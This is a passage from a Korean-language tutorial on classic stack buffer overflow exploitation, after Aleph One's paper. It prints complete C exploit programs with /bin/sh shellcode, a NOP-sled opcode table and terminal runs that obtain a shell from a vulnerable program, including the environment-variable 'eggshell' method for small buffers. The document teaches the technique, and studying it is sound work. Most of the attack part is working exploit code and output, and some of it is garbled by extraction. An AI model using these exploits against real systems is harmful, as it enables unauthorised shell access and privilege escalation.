*.zip=00;31:*.z=00;31:*.z=00;31:*.gz=00;31:*.bz2=00;31:*.bz=00;31:*.tz=00;31:*.rpm=00;31 :*.cpio=00;31:*.jpg=00;35:*.gif=00;35:*.bmp=00;35:*.xbm=00;35:*.xpm=00;35:*.png=00;35:*. tif=00;35: SSH_AUTH_SOCK=/tmp/ssh-XX6ppeE8/agent.842 PVM_ROOT=/usr/share/pvm3 USERNAME=root SESSION_MANAGER=local/localhost.localdomain:/tmp/.ICE-unix/842 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/b 116

118 in MAIL=/var/spool/mail/root PWD=/home/vangelis/test/bof INPUTRC=/etc/inputrc LANG=ko_KR.eucKR GDMSESSION=Default SSH_ASKPASS=/usr/libexec/openssh/gnome-ssh-askpass SHLVL=3 HOME=/home/vangelis GNOME_DESKTOP_SESSION_ID=Default BASH_ENV=/root/.bashrc wowhacker=/bin/sh LOGNAME=vangelis LESSOPEN= /usr/bin/lesspipe.sh %s DISPLAY=:0 G_BROKEN_FILENAMES=1 XAUTHORITY=/home/vangelis/.xauthms7oup COLORTERM=gnome-terminal _=/bin/env 위의내용을보면 wowhacker=/bin/sh 라는부분이추가되어있는것을볼수있다. 참고로환경변수와보안과의관계에대해서는 Secure Programming for Linux and Unix HOWTO 22 라는글을읽어보길바란다. 다시앞에서언급했던부분으로돌아가왜환경변수에오버플로우시킬문자열을넣게되면공격이용이해지는가? 그것은환경변수에는시스템에사용되는각종종류의기본값들이설정되어있으며, 특정사용자의환경변수에저장되어있는기본값을이용하면공격이그만큼쉬워지기때문이다. 아래의 exploit2.c와 exploit3.c를보면 putenv() 함수를이용해환경변수에쉘코드를넣고있다. putenv() 함수에대해서는맨페이지를참고하길바란다. 이제위의 vulnerable.c를공략하는 exploit를살펴보기로하자. bof]$ vi exploit2.c #include <stdlib.h> /* stack pointer 와 buffer 와의 offset 초기값 */ #define DEFAULT_OFFSET 0 /* overflow 취약점이있는프로그램의 buffer 크기초기값 */ #define DEFAULT_BUFFER_SIZE 한글판은 를참고하자. 117

119 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; /* 현재의 stack pointer 값을리턴해주는함수 */ unsigned long get_sp(void) { asm ("movl %esp,%eax"); void main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=default_offset, bsize=default_buffer_size; int i; /* 사용자입력값이있을경우, buffer 의크기와 offset 값을세팅함 */ if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); /* buff 포인터변수에메모리할당. 실패하면프로그램종료 */ if (!(buff = malloc(bsize))) { printf("can't allocate memory. n"); exit(0); /* 리턴어드레스를덮어씌울주소값 (addr 변수 ) 으로현재의 stack pointer 값에서 offset 만큼뺀값으로설정. addr 값은 system( "/bin/bash" ) 를통해서새로운 shell 이실행되면현재의 shell 환경과같은 ( 혹은비슷한 ) 가상메모리구조를가질것이라는가정하에새로생성된 shell 에서도기존의 shell 에서의 stack_pointer 를기준으로 offset 만큼떨어진위치에취약한프로그램의 buffer 가할당될것이라예상하는방법. addr 은취약한프로그램의 buffer 의예상시작주소로사용됨. 이값을정확히예측하기힘들기때문에 offset 값을바꿔가면서시행착오법을수행해야함 */ addr = get_sp() - offset; printf("using address: 0x%x n", addr); /* buff 포인터변수와 ptr 포인터변수를같게하고 addr_ptr 포인터변수에 ptr 의시작주소, 즉 buff 의시작주소를대입 */ 118

120 ptr = buff; addr_ptr = (long *) ptr; /* bsize(buffer 크기 ) 만큼 addr_ptr 에예상시작주소 (addr) 대입. 결과적으로 buff 변수는다음과같은내용을포함하게됨 */ bsize [ addr ][ addr ][ addr ]... [ addr ] for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; /* ptr, 즉 buff 의 4 바이트뒷부분, &buff[0] + 4 부분에 shellcode 대입. 따라서 buff 변수는다음과같은내용을포함하게됨. buff 의앞부분 4 바이트에는나중에 "EGG=" 문자열을넣게됨 */ 0 bsize [ addr ][ shellcode ][ addr ][ addr ][ addr ]... [ addr ] ptr += 4; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; /* 문자열종료표시 */ buff[bsize - 1] = ' 0'; /* buff 의앞부분 4 바이트부분에 "EGG=" 문자열대입후 buff 를 putenv() 함수를이용하여환경변수로설정함. 이후 system() 함수를통한새로운 /bin/bash 을실행하여 EGG 를환경변수로할당함 */ 0 bsize [ EGG= ][ shellcode ][ addr ][ addr ][ addr ]... [ addr ] memcpy(buff,"egg=",4); putenv(buff); system("/bin/bash"); ~ ~ [vangelis@localhost bof]$ gcc -o exploit2 exploit2.c exploit2.c: In function `main': 119

121 exploit2.c:15: warning: return type of `main' is not `int' bof]$./exploit2 500 Using address: 0xbffff8f8 bof]$./vulnerable $EGG bof]$ exit exit bof]$./exploit2 600 Using address: 0xbffff8f8 bof]$./vulnerable $EGG 세그멘테이션오류 bof]$ exit exit bof]$./exploit Using address: 0xbffff894 bof]$./vulnerable $EGG 세그멘테이션오류 bof]$ exit exit bof]$./exploit Using address: 0xbffff830 bof]$./vulnerable $EGG 세그멘테이션오류 bof]$ exit exit bof]$./exploit Using address: 0xbffff704 bof]$./vulnerable $EGG 세그멘테이션오류 bof]$ 앞에서우리가처음직면했던문제가스택포인트의시작위치를알아내는것이었다. 그래서 sp.c라는소스를사용했었다. 그러나스택포인터의위치를알아도위의방법대로 120

122 offset의위치를추측하여공략한다는것은너무비효율적이라는것을알수있다. 이제남은문제는쉘코드의위치를정확하게추측하는것이다. 사실쉘코드의위치만안다면문제는거의해결이된셈이다. 따라서위의 exploit를수정할필요가있는데, 수정할때사용되는방법은 NOP instruction을사용한다는것이다 23. NOP을사용하면어떤효과가있는것일까? 거의모든프로세서 (processor) 들이 NOP instruction을가지고있다. NOP은적절한타이밍조절목적으로실행을연기시키기위해사용된다. 이제부터오버플로우공격시 NOP이어떻게사용될수있는지살펴보자. 그전에각종프로세서들에대해쉘코드에서사용되는 NOP을제시하면다음과같다. Architecture Code (hex, 00=wild) Opcode HPPA a xor %r1,%r1,%r26 HPPA xor %r1,%r2,%r3 HPPA 08 a or %r4,%r5,%r6 HPPA f shladd %r4,2,%r8,%r15 HPPA sub %r9,%r8,%r7 HPPA 09 6a 02 8c xor %r10,%r11,%12 HPPA 09 cd 06 0f add %r13,%r14,%r15 Sprc 20 bf bf 00 bn -random IA32 27 daa IA32 2f das IA32 33 c0 xor %eax,%eax IA32 37 aaa IA32 3f aas IA32 40 inc %eax IA32 41 inc %ecx IA32 42 inc %edx IA32 43 inc %ebx IA32 44 inc %esp IA32 45 inc %ebp IA32 46 inc %esi IA32 47 inc %edi IA32 48 dec %eax, IA32 4a dec %edx IA32 4b dec %ebx IA32 4c dec %esp IA32 4d dec %ebp, IA32 4e dec %esi 23 NOP 을사용하지않고오버플로우취약점을가진프로그램을공략하는방법도물론있다. 그것은이글의범위를넘어서는것이라여기서는언급하지않을것이다. Netric Security Team 에의해발표된글을보면잘나타나있다. 를참고하길바란다. 121

123 IA32 4f dec %edi IA32 50 push %eax IA32 51 push %ecx IA32 52 push %edx IA32 53 push %ebx IA32 54 push %dsp IA32 55 push %ebp IA32 56 push %esi IA32 57 push %edi IA32 58 pop %eax IA32 59 pop %ecx IA32 5a pop %edx IA32 5b pop %ebx IA32 5d pop %ebp IA32 5e pop %esi IA32 5f pop %edi IA32 60 pusha IA32 6b c0 00 imul N,%eax Sprc 81 d tn random IA32 83 e0 00 and N,%eax IA32 83 c8 00 or N,%eax IA32 83 e8 00 sub N,%eax IA32 83 f0 00 xor N,%eax IA32 83 f8 00 cmp N,%eax IA32 83 f9 00 cmp N,%ecx IA32 83 fa 00 cmp N,%edx IA32 83 fb 00 cmp N,%ebx IA32 83 c0 00 add N,%eax IA32 85 c0 test %eax,%eax IA32 87 d2 xchg %edx,%edx IA32 87 db xchg %ebx,%ebx IA32 87 c9 xchg %ecx,%ecx Sprc 89 a fadds %f20,%f2,%f4 IA32 8c c0 mov %es,%eax IA32 8c e0 mov %fs,%eax IA32 8c e8 mov %gs,%eax IA32 90 regular NOP IA32 91 xchg %eax,%ecx IA32 92 xchg %eax,%edx IA32 93 xchg %eax,%ebx HPPA 94 6c e0 84 subi,od 42,%r3,%r12 IA32 95 xchg %eax,%ebp IA32 96 xchg %eax,%esi Sprc sub %o5, 42,%o3 Sprc sub %l2,%l2,%o3 IA32 97 xchg %eax,%edi 122

124 IA32 98 cwtl Sprc 98 3e xnor %i2,%l2,%o4 IA32 99 cltd IA32 9b fwait IA32 9c pushf IA32 9e safh IA32 9f lahf Sprc a0 26 e0 00 sub %i3, 42,%l0 Sprc a add %o5,%l2,%l1 Sprc a2 0e and %i2,%l3,%l1 Sprc a2 1a 40 0a xor %o1,%o2,%l1 Sprc a2 1c xor %l2,%l2,%l1 Sprc a4 04 e0 00 add %l3, 42,%l2 Sprc a sub %i5,%l2,%l2 Sprc a4 32 a0 00 orn %o2, 42,%l2 IA32 b0 00 mov N,%eax Sprc b add %o5, 42,%i1 Sprc b sub %i2,%i1,%i1 HPPA b5 03 e0 00 addi,od 42,%r8,%r3 HPPA b5 4b e0 00 addi,od 42,%r10,%r11 Sprc b a add %i1,%i2,%i3 Sprc b a or %i1,%i2,%i3 Sprc b add %l2,%l2,%i3 Sprc b add %o5, 42,%i3 Sprc ba 56 a0 00 umul %i2, 42,%i5 IA32 c1 c0 00 rol N,%eax IA32 c1 c8 00 ror N,%eax IA32 c1 e8 00 shr N,%eax HPPA d0 e8 0a e9 shrpw %r8,%r7,8,%r9 IA32 f5 cmc IA32 f7 d0 not %eax IA32 f8 clc IA32 f9 stc IA32 fc cld 위의목록에서우리는 IA32 아키텍처에서사용되는일반적인 90을사용할것이다. 참고로말하자면요즘서버보안을위해사용되는각종침입탐지시스템 (IDS) 의경우오버플로우공격을막기위해각종 NOP을필터링하고있다. 그래서오버플로우취약점을가지고있지만일반적인 NOP 코드를사용할경우공격에실패할경우가있다. 물론이를우회하는방법도있지만이문서에서다루는부분은아니기때문에필터링부분에대해서는언급하지않을것이다. 이제 NOP을오버플로우공격에서어떻게사용할지에대해알아보자. 우선오버플로우를시킬버퍼의절반정도 NOP을채운다. 그리고가운데에쉘코드를 123

125 위치시킨다. 물론 exploit을작성할때는버퍼의크기와쉘코의크기를봐서조정해야할것이다. 그런다음리턴어드레스를그다음에위치시킨다. 만약운이좋거나리턴어드레스가 NOP의특정위치를가리킨다면쉘코드에도달하기전까지 NOP이실행되다가결국쉘코드가실행될것이다. 앞에서도잠깐언급했듯이, Intel 아키텍처 (IA32) 에서 NOP instruction은크기가 1 바이트이며, 기계어코드로는 0x90이다. Aleph One의글에나오는표를보자. bottom of DDDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF top of memory 89ABCDEF AB CDEF AB CDEF memory buffer sfp ret a b c < [NNNNNNNNNNNSSSSSSSSS][0xDE][0xDE][0xDE][0xDE][0xDE] ^ top of stack bottom of stack 위의표에서 N은 NOP을, S는쉘코드를가리킨다. NOP은버퍼의절반정도를차지하고있고, 나머지부분은쉘코드가들어가있다. 표를보면알겠지만리턴어드레스가 NOP을가리키고있다. NOP이실행되다가결국쉘코드가실행될것이다. 쉘코드가실행되면당연쉘을획득할수있게된다. 이제 NOP이포함된수정된 exploit3.c를작성한다. [vangelis@localhost bof]$ vi exploit3.c #include <stdlib.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { asm ("movl %esp,%eax"); 124

126 void main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=default_offset, bsize=default_buffer_size; int i; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (!(buff = malloc(bsize))) { printf("can't allocate memory. n"); exit(0); addr = get_sp() - offset; printf("using address: 0x%x n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; /* buff 변수의절반크기만큼앞쪽부분에 NOP 할당. 결과적으로 buff 변수는다음과같은내용을포함하게됨 */ 0 bsize/2-1 bsize [ NOP ][ NOP ]... [ NOP ][ addr ][ addr ]... [ addr ] for (i = 0; i < bsize/2; i++) buff[i] = NOP; 125

127 /* buff 크기의중간부분에 shellcode 대입. 따라서 buff 변수는다음과같은내용을포함하게됨 */ 0 bsize [ NOP ][ NOP ]... [ NOP ][ shellcode ][ addr ][ addr ]... [ addr ] ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = ' 0'; /* buff 의앞부분 4 바이트부분에 "EGG=" 문자열대입후, buff 를 putenv() 함수를이용하여환경변수로설정함. 이후 system() 함수를통한새로운 /bin/bash 을실행하여 EGG 를환경변수로할당함 */ 0 bsize [ EGG= ][ NOP ]... [ NOP ][ shellcode ][ addr ][ addr ]... [ addr ] memcpy(buff,"egg=",4); putenv(buff); system("/bin/bash"); ~ ~ [vangelis@localhost bof]$ gcc -o exploit3 exploit3.c exploit3.c: In function `main': exploit3.c:16: warning: return type of `main' is not `int' [vangelis@localhost bof]$./exploit3 Using address: 0xbffff8f8 이 exploit3 는환경변수를조작한다. 즉, NOP 과쉘코드를환경변수에집어넣는다. 그렇다면 exploit3 를실행하게되면 NOP 과쉘코드가환경변수에들어가게된다. exploit3 를실행한후 환경변수를확인해보자. 126

128 bof]$ env SSH_AGENT_PID=953 HOSTNAME=localhost.localdomain PVM_RSH=/usr/bin/rsh TERM=xterm SHELL=/bin/bash HISTSIZE=1000 JLESSCHARSET=ko GTK_RC_FILES=/etc/gtk/gtkrc:/root/.gtkrc-1.2-gnome2 WINDOWID= QTDIR=/usr/lib/qt3-gcc3.2 EGG= 혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨?^ 혟 1? 혞 F 혟 F? 혟? 혥혥 V??1? 혟?@?? 黎???/bin/sh?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? USER=vangelis LS_COLORS=no=00:fi=00:di=00;34:ln=00;36:pi=40;33:so=00;35:bd=40;33;01:cd=40;33;01:or=01; 05;37;41:mi=01;05;37;41:ex=00;32:*.cmd=00;32:*.exe=00;32:*.com=00;32:*.btm=00;32:*.bat=0 0;32:*.sh=00;32:*.csh=00;32:*.tar=00;31:*.tgz=00;31:*.arj=00;31:*.taz=00;31:*.lzh=00;31: *.zip=00;31:*.z=00;31:*.z=00;31:*.gz=00;31:*.bz2=00;31:*.bz=00;31:*.tz=00;31:*.rpm=00;31 :*.cpio=00;31:*.jpg=00;35:*.gif=00;35:*.bmp=00;35:*.xbm=00;35:*.xpm=00;35:*.png=00;35:*. tif=00;35: SSH_AUTH_SOCK=/tmp/ssh-XXXy5zD5/agent.894 PVM_ROOT=/usr/share/pvm3 USERNAME=root SESSION_MANAGER=local/localhost.localdomain:/tmp/.ICE-unix/894 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/b in MAIL=/var/spool/mail/root PWD=/home/vangelis/test/bof INPUTRC=/etc/inputrc XMODIFIERS=@im=Ami LANG=ko_KR.eucKR GDMSESSION=Default SSH_ASKPASS=/usr/libexec/openssh/gnome-ssh-askpass SHLVL=5 HOME=/home/vangelis GNOME_DESKTOP_SESSION_ID=Default 127

129 BASH_ENV=/root/.bashrc LOGNAME=vangelis LESSOPEN= /usr/bin/lesspipe.sh %s DISPLAY=:0 G_BROKEN_FILENAMES=1 XAUTHORITY=/home/vangelis/.xauthvFuoQk COLORTERM=gnome-terminal _=/bin/env bof]$ 위의결과에서진하게나타나있는부분이환경변수에 NOP과쉘코드가들어가있는것이다. 터미널에서는그냥공백으로보이지만실제이것은공백이아니며, 텍스트편집기로살펴보면일부기계어들이깨져있지만 F 0080 등이들어가있는것을볼수있다. 필자는 Red Hat 리눅스에있는어플리케이션 gedit로확인했다. 이제부터공격과정을보자. 공격을할때는인자로들어가는버퍼크기 ( 소스에서 bsize) 를잘선택해야하는데, 그것은오버플로우시키고자원하는버퍼의크기보다약 100 바이트이상이게한다. 이것은 NOP을위한충분한공간을확보하면서버퍼의끝에쉘코드를위치시키기위한것이다. 하지만여전히추측한주소로리턴어드레스를덮어써야한다. 추측하더라도 NOP 덕분으로공격성공률이높아지게된다. 우리가공격하고자하는취약한프로그램 vulnerable.c에서 buffer는 512 바이트였으므로 612 바이트를사용하면공격성공률이높을것이다. 필자는필자의시스템에맞게공격을해보았다. 다음은그결과이다. [vangelis@localhost bof]$./exploit3 532 Using address: 0xbffff6f8 [vangelis@localhost bof]$./vulnerable $EGG 세그멘테이션오류 [vangelis@localhost bof]$ exit exit [vangelis@localhost bof]$./exploit3 533 Using address: 0xbffff6f8 [vangelis@localhost bof]$./vulnerable $EGG sh-2.05b$ - 중략 - 128

130 bof]$./exploit3 614 Using address: 0xbffff6f8 bof]$./vulnerable $EGG sh-2.05b$ bof]$./exploit3 615 Using address: 0xbffff6f8 bof]$./vulnerable $EGG 세그멘테이션오류 원문에는 612 바이트를사용하고있지만필자는이용가능한모든범위를확인해보았다. 필자의시스템에서실시한위의결과를보면 612 바이트를포함해약 81번의공격성공기회가있다는것을보여준다. 다음으로, Aleph One은당시그의글을쓸때발표된 Xt library 버퍼오버플로우취약점을실제공격의예로제공하고있는데, 현재상황에서는이런문제가극복되어있고, 그때와같은상황을필자의시스템에서구현하여테스트하기가귀찮아여기에대해서는언급하지않고다음섹션으로넘어가겠다. Small Buffer Overflows 이번섹션은우리가흔히알고있는 eggshell을이용하여오버플로우취약점을공략하는방법에대해서언급하고있다. 가끔오버플로우취약점을가지고있지만할당된버퍼의크기가쉘코드를넣기에는너무작아쉘코드를사용할수없을경우가있다. 그렇다면앞에서우리가살펴본방법들은실효성이없게된다. 공격자가오버플로우시키려고시도하는버퍼가아주작아쉘코드가들어갈공간이부족하여쉘코드의주소대신 NOP으로리턴어드레스를덮어쓰게되거나, 또는문자열의앞에 129

131 붙일수있는 NOP의수가아주작아리턴어드레스를추측할기회가줄어들경우가있다. 이런경우취약한프로그램으로부터쉘을획득하기위해서는앞에서사용했던것과는다른방법을이용해야한다. 이방법은프로그램의환경변수에접근할수있을때만가능하다. 즉, 이것은환경변수를이용한공격이라는것이다. 구체적인방법은다음과같다. 먼저환경변수에쉘코드를위치시킨다. 그런다음메모리에있는이환경변수의주소로버퍼를오버플로우시킨다. 이방법은또한원하는만큼의쉘코드를한경변수에넣을수있어공격기회를증가시켜준다. 환경변수는프로그램이시작될때스택의꼭대기에저장되며, setenv() 함수에의해어떤변경된내용이메모리의어떤공간에할당된다. 시작시스택의모양은다음과같다. <strings><argv pointers>null<envp pointers>null<argc><envp> 이제언급한내용들을적용한 exploit4.c 를통해취약한프로그램을공격해보자. 먼저 vulnerable.c 를공격해보고, 그다음으로 vulnerable.c 의소스를수정하여말그대로 small buffer overflow 공격을해보기로하겠다. bof]$ vi exploit.c #include <stdlib.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_esp(void) { asm ("movl %esp,%eax"); 130

132 int main(int argc, char *argv[]) { char *buff, *ptr, *egg; long *addr_ptr, addr; int offset=default_offset, bsize=default_buffer_size; int i, eggsize=default_egg_size; /* 사용자입력값이있을경우, buffer 의크기, offset 값과 egg 의크기를세팅함 */ if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) eggsize = atoi(argv[3]); /* buff 포인터변수에메모리할당. 실패하면프로그램종료 */ if (!(buff = malloc(bsize))) { printf("can't allocate memory. n"); exit(0); /* egg 포인터변수에메모리할당. 실패하면프로그램종료 */ if (!(egg = malloc(eggsize))) { printf("can't allocate memory. n"); exit(0); /* 리턴어드레스를덮어씌울주소값 (addr 변수 ) 으로현재의 stack pointer 값에서 offset 만큼뺀값으로설정. addr 은 eggshell 을띄울환경변수 EGG 의예상시작주소로사용됨. 이값을정확히예측하기힘들기때문에 offset 값을바꿔가면서시행착오법을수행해야함 */ addr = get_esp() - offset; printf("using address: 0x%x n", addr); 131

133 /* buff 포인터변수와 ptr 포인터변수를같게하고 addr_ptr 포인터변수에 ptr 의시작주소, 즉 buff 의시작주소를대입 */ ptr = buff; addr_ptr = (long *) ptr; /* bsize(buffer 크기 ) 만큼 addr_ptr 에예상시작주소 (addr) 대입. 결과적으로 buff 변수는다음과같은내용을포함하게됨 */ bsize [ addr ][ addr ][ addr ]... [ addr ] for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; /* egg 포인터변수와 ptr 포인터변수를같게하고 */ ptr = egg; /* eggsize 에 shellcode 의크기를뺀만큼 NOP 를할당. egg 변수는다음과같은값을가지게됨 0 eggsize [ NOP ][ NOP ][ NOP ]... [ NOP ][ NOP ][ garbage ] */ for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++) = NOP; /* egg 변수의 [ garbage ] 부분에 shellcode 를대입. 결과적으로 egg 변수는다음과같은값을가지게됨 0 eggsize [ NOP ][ NOP ][ NOP ]... [ NOP ][ NOP ][ shellcode ] */ for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; /* 문자열종료표시 */ 132

134 buff[bsize - 1] = ' 0'; egg[eggsize - 1] = ' 0'; /* egg 의앞부분 4 바이트부분에 "EGG=" 문자열을대입하고, buff 의앞부분 4 바이트부분에 "RET=" 문자열을대입한후 putenv() 함수를이용하여환경변수로각각설정함. 이후 system() 함수를통한새로운 /bin/bash 을실행하여 EGG 와 RET 를환경변수로각각할당함. -=[ egg ]=- 0 eggsize [ EGG= ][ NOP ][ NOP ]... [ NOP ][ NOP ][ shellcode ] */ -=[ buff ]=- 0 bsize [ RET= ][ addr ][ addr ]... [ addr ] memcpy(egg,"egg=",4); putenv(egg); memcpy(buff,"ret=",4); putenv(buff); system("/bin/bash"); ~ ~ [vangelis@localhost bof]$ gcc -o exploit4 exploit4.c exploit4.c: In function main : exploit4.c:19: warning: return type of main is not int [vangelis@localhost bof]$./exploit Using address: 0xbfffedf8 [vangelis@localhost bof]$./vulnerable $RET 세그멘테이션오류 [vangelis@localhost bof]$./exploit Using address: 0xbfffedf8 [vangelis@localhost bof]$./vulnerable $RET sh-2.05b$ 133

135 이제 vulnerable.c 의소스를다음과같이수정해서공략해보기로한다. newvulnerable.c void main(int argc, char *argv[]) { char buffer[30]; if(argc > 1) strcpy(buffer,argv[1]); [vangelis@localhost bof]$ gcc -o newvulnerable newvulnerable.c newvulnerable.c: In function main : newvulnerable.c:1: warning: return type of main is not int [vangelis@localhost bof]$./exploit Using address: 0xbfffebe8 [vangelis@localhost bof]$./newvulnerable $RET 세그멘테이션오류 [vangelis@localhost bof]$./exploit Using address: 0xbfffebe8 [vangelis@localhost bof]$./newvulnerable $RET sh-2.05b$ 위의결과를보면환경변수를이용하면공격이얼마나용이한지알수있다. 그럼실제 exploit4 를실행하게되면환경변수의항목 EGG 에쉘코드와 NOP 이들어가있는지살펴보자. [vangelis@localhost bof]$ env SSH_AGENT_PID=870 HOSTNAME=localhost.localdomain PVM_RSH=/usr/bin/rsh TERM=xterm SHELL=/bin/bash HISTSIZE=1000 JLESSCHARSET=ko 134

136 GTK_RC_FILES=/etc/gtk/gtkrc:/root/.gtkrc-1.2-gnome2 WINDOWID= QTDIR=/usr/lib/qt3-gcc3.2 EGG= 혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨